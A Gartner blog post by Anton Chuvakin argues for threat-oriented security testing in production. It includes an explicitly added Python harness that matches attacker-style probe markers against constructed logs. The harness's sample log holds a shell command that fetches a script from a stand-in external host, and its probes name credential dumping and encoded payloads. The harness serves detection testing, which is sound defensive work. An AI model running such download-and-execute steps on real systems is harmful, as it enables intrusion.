Gartner Blog Network


Why This Paper? or Mysteries of Testing Security!

by Anton Chuvakin  |  June 12, 2018

Some of you have been wondering why we decided to embark on a project that resulted in our paper called “Threat-Oriented Approaches to Test Security in Production” [Gartner GTP access required].

For sure, the same research project also produced our world-famous BAS (breach and attack simulation) paper, but that one is a more traditional here-is-a-new-tech-and-how-to-use-it kind of document.

The testing paper, as we called it during development, is different. While some may consider it “a WHAT paper” (as opposed to “HOW papers” such as our SIEM, VM or MSSP guidance documents), it does seek to popularize the concept and practice of testing security in production.

Look, we all secretly know that much, if not most, of deployed security technology and developed security process is “faith-based” (or “luck-based” for the militant atheists). Some may counter that they are “risk-based” in their enlightened organization, but I’d counter-counter that your risks are also very often “faith-based” themselves. And even if you somehow “know” your risks, the real-world effectiveness of security technology and practice is so uncertain in most cases as to be purely an article of faith.

For god’s sake, after a quarter of a century of trying, we cannot agree on how to test anti-malware. In a lab. In a vacuum. With an unlimited supply of vacuum-breathing lab rats. Also, we debate whether changing passwords every 90 days has security value. For 50 years. With no resolution. In sight.

This is the world we live in. This is the world we’ve lived in since the dawn of the infosec era in the late 1980s. Calling it “cyber” does not help. So, let’s just quietly accept it and then seek to change it! Our paper is our attempt to initiate such change.

We think security professionals need to TEST MORE and BELIEVE LESS! You may say that security people are a skeptical bunch naturally, but – look – see those shiny security appliances? Who do you think bought them?!

So, we scoped the research to cover “tests used to verify the current status of production environments, obtaining evidence directly from them.” Also, we look only at tests that are “threat-focused, that is, they use methods or look for data used by threat actors during their attacks.” We believe that this is a good way to test security and to make it more fact-based, or evidence-based. This is bigger than BAS, and not the same as pentesting, even though both play a role.
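To make the two scoping criteria concrete, here is a small added example of what a threat-oriented test harness looks like in code. It is not from the Gartner paper and not a real product: the probe names, the marker field and the log format are all invented for this illustration, and the log lines are constructed. The idea it shows is the part the paragraph leaves implicit: each attacker-style action carries a unique marker, and the harness then goes looking for that marker in the telemetry defenders actually have, so that “the control fired”, “the control missed” and “we cannot even see our own action” (the faith-based case) come out as three different verdicts instead of one shrug.

```python
"""Threat-oriented production test harness (hypothetical illustration).

Each Probe stands for an attacker-style action that was run in production
carrying a unique marker. The harness then reads the telemetry the defenders
really have and decides, per probe, whether the action was detected, merely
recorded, or invisible. Log format and field names are invented for the example.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Probe:
    name: str        # hypothetical test name
    technique: str   # attacker technique it imitates (free text here)
    marker: str      # unique token the action carried, to separate it from real traffic


@dataclass(frozen=True)
class Verdict:
    probe: str
    outcome: str     # "detected" | "missed" | "no_telemetry"
    detail: str


# Constructed telemetry for the example: key=value lines of an imaginary log pipeline.
# RUN-0001 was seen and alerted on, RUN-0002 was logged but no rule fired,
# RUN-0003 left no trace at all.
CONSTRUCTED_LOG = """\
2018-06-12T10:00:01Z host=web01 event=process_create image=/bin/sh cmd="sh -c 'curl http://updates.example.test/patch.sh'" marker=none
2018-06-12T10:00:05Z host=web01 event=alert rule=suspicious_download severity=high cmd="sh -c 'curl http://updates.example.test/patch.sh'" marker=RUN-0001
2018-06-12T10:00:09Z host=web01 event=process_create image=/usr/bin/base64 cmd="base64 -d /tmp/x" marker=RUN-0002
2018-06-12T10:00:12Z host=web01 event=process_create image=/usr/bin/sleep cmd="sleep 1" marker=none
"""

PROBES: List[Probe] = [
    Probe("download_staging", "fetch a script from an external host", "RUN-0001"),
    Probe("encoded_payload", "decode a base64 payload on disk", "RUN-0002"),
    Probe("cred_dump", "read credential material from the host", "RUN-0003"),
]

EVENT_RE = re.compile(r"\bevent=(?P<event>\S+)")
MARKER_RE = re.compile(r"\bmarker=(?P<marker>\S+)")


def classify(probe: Probe, log_lines: Iterable[str]) -> Verdict:
    """Look for the probe's marker in the telemetry and decide what the evidence says."""
    seen_raw = False
    for line in log_lines:
        m = MARKER_RE.search(line)
        if not m or m.group("marker") != probe.marker:
            continue  # real traffic or another probe; ignore
        ev = EVENT_RE.search(line)
        if ev and ev.group("event") == "alert":
            # A detection rule fired on our action: the control demonstrably works.
            return Verdict(probe.name, "detected", line.strip())
        seen_raw = True  # the action is visible in raw telemetry at least
    if seen_raw:
        return Verdict(probe.name, "missed", "action was recorded but no rule fired")
    # Nothing at all: we cannot even observe our own attack, so any claim that
    # this technique is "covered" is an article of faith, not evidence.
    return Verdict(probe.name, "no_telemetry", "no record of the action in any log")


def run_all(probes: Iterable[Probe], log_text: str) -> Dict[str, Verdict]:
    lines = log_text.splitlines()
    return {p.name: classify(p, lines) for p in probes}


def summary(verdicts: Dict[str, Verdict]) -> Dict[str, int]:
    counts = {"detected": 0, "missed": 0, "no_telemetry": 0}
    for v in verdicts.values():
        counts[v.outcome] += 1
    return counts


if __name__ == "__main__":
    results = run_all(PROBES, CONSTRUCTED_LOG)
    for name, v in results.items():
        print(f"{name:18} {v.outcome:13} {v.detail}")
    print(summary(results))
```

The point of the third outcome is the whole argument of this post: a test that comes back “no_telemetry” is not a pass and not a fail, it is proof that nobody could have known either way. In a real deployment the probes would execute the attacker-style action (not just carry a label) and the log reader would query the SIEM or EDR console, but the marker-then-search pattern is the same.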

There you have it! Now go and Test More! Gather data!! Make security fact-based!!! [again? no, not again – it never really was :-)]

Category: security, simulation, testing

Anton Chuvakin
Research VP and Distinguished Analyst
5+ years with Gartner
17 years IT industry

Anton Chuvakin is a Research VP and Distinguished Analyst at Gartner's GTP Security and Risk Management group. Before Mr. Chuvakin joined Gartner, his job responsibilities included security product management, evangelist… Read Full Bio



